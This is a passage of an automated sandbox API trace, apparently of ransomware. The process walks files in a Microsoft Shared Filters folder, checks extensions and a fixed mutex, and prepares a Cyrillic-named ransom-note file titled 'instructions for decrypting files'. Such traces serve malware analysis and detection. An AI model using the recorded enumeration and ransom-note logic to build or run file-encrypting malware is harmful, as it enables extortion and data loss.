dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", cchWideChar=66, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dllà", lpUsedDefaultChar=0x0) returned 66 [0109.323] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\msgfilt.dllà", lpUsedDefaultChar=0x0) returned 4 [0109.323] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0109.323] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.323] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.323] GlobalLock (hMem=0x450004) returned 0x591988 [0109.323] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.323] GlobalUnlock (hMem=0x450004) returned 0 [0109.323] GlobalLock (hMem=0x450004) returned 0x591988 [0109.324] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.324] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.324] GlobalUnlock (hMem=0x450004) returned 0 [0109.324] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.324] GlobalUnlock (hMem=0x45000c) returned 0 [0109.324] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.324] CharLowerBuffW (in: lpsz="odffilt.dll", cchLength=0xb | out: lpsz="odffilt.dll") returned 0xb [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.324] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", cchWideChar=66, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dllà", lpUsedDefaultChar=0x0) returned 66 [0109.325] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\odffilt.dllà", lpUsedDefaultChar=0x0) returned 4 [0109.325] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0109.325] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.325] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.325] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.325] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.325] GlobalUnlock (hMem=0x45000c) returned 0 [0109.325] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.325] GlobalLock (hMem=0x450004) returned 0x593998 [0109.325] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.325] GlobalUnlock (hMem=0x45000c) returned 0 [0109.325] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.325] GlobalUnlock (hMem=0x450004) returned 0 [0109.325] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.326] CharLowerBuffW (in: lpsz="offfiltx.dll", cchLength=0xc | out: lpsz="offfiltx.dll") returned 0xc [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpUsedDefaultChar=0x0) returned 67 [0109.326] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\offfiltx.dll", lpUsedDefaultChar=0x0) returned 4 [0109.326] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0109.326] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.326] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.326] GlobalLock (hMem=0x450004) returned 0x591988 [0109.326] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.327] GlobalUnlock (hMem=0x450004) returned 0 [0109.327] GlobalLock (hMem=0x450004) returned 0x591988 [0109.327] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.327] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.327] GlobalUnlock (hMem=0x450004) returned 0 [0109.327] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.327] GlobalUnlock (hMem=0x45000c) returned 0 [0109.327] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.327] CharLowerBuffW (in: lpsz="VISFILT.DLL", cchLength=0xb | out: lpsz="visfilt.dll") returned 0xb [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ví\x18", lpUsedDefaultChar=0x0) returned 1 [0109.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", cchWideChar=66, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLLà", lpUsedDefaultChar=0x0) returned 66 [0109.328] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\Filters\\VISFILT.DLLà", lpUsedDefaultChar=0x0) returned 4 [0109.328] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0109.328] GetLastError () returned 0x12 [0109.328] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.328] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.328] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.328] GlobalUnlock (hMem=0x45000c) returned 0 [0109.328] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.328] GlobalLock (hMem=0x450004) returned 0x593998 [0109.328] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.328] GlobalUnlock (hMem=0x45000c) returned 0 [0109.328] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.328] GlobalUnlock (hMem=0x450004) returned 0 [0109.328] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.329] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.329] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.329] GlobalLock (hMem=0x450004) returned 0x591988 [0109.329] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.329] GlobalUnlock (hMem=0x450004) returned 0 [0109.329] GlobalLock (hMem=0x450004) returned 0x591988 [0109.329] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.329] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.329] GlobalUnlock (hMem=0x450004) returned 0 [0109.329] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.329] GlobalUnlock (hMem=0x45000c) returned 0 [0109.329] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.329] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.329] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.329] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.329] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.329] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.329] GlobalUnlock (hMem=0x45000c) returned 0 [0109.329] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.329] GlobalLock (hMem=0x450004) returned 0x593998 [0109.329] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.330] GlobalUnlock (hMem=0x45000c) returned 0 [0109.330] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.330] GlobalUnlock (hMem=0x450004) returned 0 [0109.330] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.330] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0109.330] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.330] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.330] GlobalLock (hMem=0x450004) returned 0x591988 [0109.330] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.330] GlobalUnlock (hMem=0x450004) returned 0 [0109.330] GlobalLock (hMem=0x450004) returned 0x591988 [0109.330] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.333] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.333] GlobalUnlock (hMem=0x450004) returned 0 [0109.333] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.333] GlobalUnlock (hMem=0x45000c) returned 0 [0109.333] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.333] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0109.333] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.333] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.333] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.333] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.333] GlobalUnlock (hMem=0x45000c) returned 0 [0109.333] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.333] GlobalLock (hMem=0x450004) returned 0x593998 [0109.333] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.333] GlobalUnlock (hMem=0x45000c) returned 0 [0109.333] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.333] GlobalUnlock (hMem=0x450004) returned 0 [0109.334] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.334] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0109.334] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.334] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.334] GlobalLock (hMem=0x450004) returned 0x591988 [0109.334] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.334] 